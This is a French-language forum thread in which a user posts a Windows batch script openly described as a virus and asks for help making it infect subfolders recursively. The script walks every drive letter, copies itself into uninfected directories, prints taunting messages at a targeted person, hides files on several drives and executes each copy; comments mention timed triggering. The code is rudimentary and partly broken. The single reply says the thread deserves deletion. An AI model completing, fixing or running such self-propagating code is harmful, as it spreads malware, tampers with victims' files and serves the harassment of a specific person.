Script batch

Discutez d'informatique ici !
Abouz
Membre Naturel
Messages: 19
Enregistré le: 04 Fév 2017, 19:12

Script batch

par Abouz » 12 Juin 2017, 22:28

Salut à vous j'aurais besoin de votre aide sur le script qui suit. en effet c'est un programme qui permet d'infecter les unités de stockage et les dossiers qui s'y trouvent. j'aimerai maintenant infecter ces dossiers et leurs sous dossiers j'ai essayé de le faire mais ça ne marche pas. La ligne de code que j'ai ajoutée est en rouge.

@echo off



REM ---------------------------------------------------------------------------------------------------
REM --------------ROUTINE DE RECHERCHE DE LA CIBLE-----------------------------------------------------
REM ---------------------------------------------------------------------------------------------------
REM On va considérer comme cible ici les répertoires et dans ce module on va s’assurer avant
REM infection, que le répertoire cible n’est pas déjà infecté (une façon d’éviter la surinfection).
REM Ici on parcours tous les répertoires contenues dans chaque unités de stockage et on test à chaque fois
REM si le virus est présent. S’il est absent, on enregistre ce répertoire (la cible) dans le fichier
REM « variable.txt » fsutil fsinfo drives





For %%i in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: q: r: s: t: u: v: w: x: y: z: ) Do (
IF NOT EXIST %%i\nomVirus.bat echo %%i\ >> variable.txt
For /d %%j in (%%i\*) Do (IF NOT EXIST %%j\nomVirus.bat echo %%j >> variable.txt )

)
For /d %%k in (%%j\*) Do (IF NOT EXIST %%k\nomVirus.bat echo %%k >> variable.txt )

)


REM -------------------------------------------------------------------------------------------------------
REM ---------------------------------------ROUTINE DE COPIE------------------------------------------------
REM -------------------------------------------------------------------------------------------------------
REM La copie va consister tout simplement à recopier le virus dans les répertoires cible qui sont
REM contenus dans le fichier « variable.txt »
REM N.B: pour supprimer les fichiers taper la commande " For /F %in (variable.txt ) Do (del %i\nomVirus.bat)" dans l'invite de commande



For /F %%i in (variable.txt ) Do (copy nomVirus.bat %%i\ )



REM -------------------------------------------------------------------------------------------------------
REM ---------------------------------------ROUTINE ANTIDETECTION -----------------------------------------
REM -------------------------------------------------------------------------------------------------------









REM ------------------------------------------------------------------------------------------------------
REM ---------------------------------------CHARGE FINALE--------------------------------------------------
REM ------------------------------------------------------------------------------------------------------



echo %USERNAME% tu est un petit troubleur à mes cours, tu viens de te faire infecter par mon virus
Ping localhost -n 4 > nul
echo Tu verra ce que cela te coûte de déranger à mes cours
Ping localhost -n 4 > nul
echo Maintenant, je vais détruire tes fichiers et on verra qui est le plus malin de nous deux
Ping localhost -n 4 > nul

e:
attrib +h /S /D
d:
attrib +h /S /D
f:
attrib +h /S /D
cd g:\
attrib -h /S /D
echo Les fichiers de tes clé usb sont tous supprimés. Assia %USERNAME% le troubler.


REM Ici, on lance l'exécution de chaque copie de virus qu'on a injecté dans la machine de la victime.
REM Nottons comme on l'a dit dans le cours, qu'on peut programmer un déclancheur pour lancer l'exécusion
REM de ces différentes copies à une date précise en utilisant par exemple la commande "AT"

For /F %i in (variable.txt ) Do call %i\ nomVirus.bat



Dlzlogic
Membre Transcendant
Messages: 5273
Enregistré le: 14 Avr 2009, 13:39

Re: Script batch

par Dlzlogic » 12 Juin 2017, 23:21

A mon avis, ce sujet mérite d'être supprimé.

 

Retourner vers ϟ Informatique

Qui est en ligne

Utilisateurs parcourant ce forum : Aucun utilisateur enregistré et 2 invités

Tu pars déja ?



Fais toi aider gratuitement sur Maths-forum !

Créé un compte en 1 minute et pose ta question dans le forum ;-)
Inscription gratuite

Identification

Pas encore inscrit ?

Ou identifiez-vous :

Inscription gratuite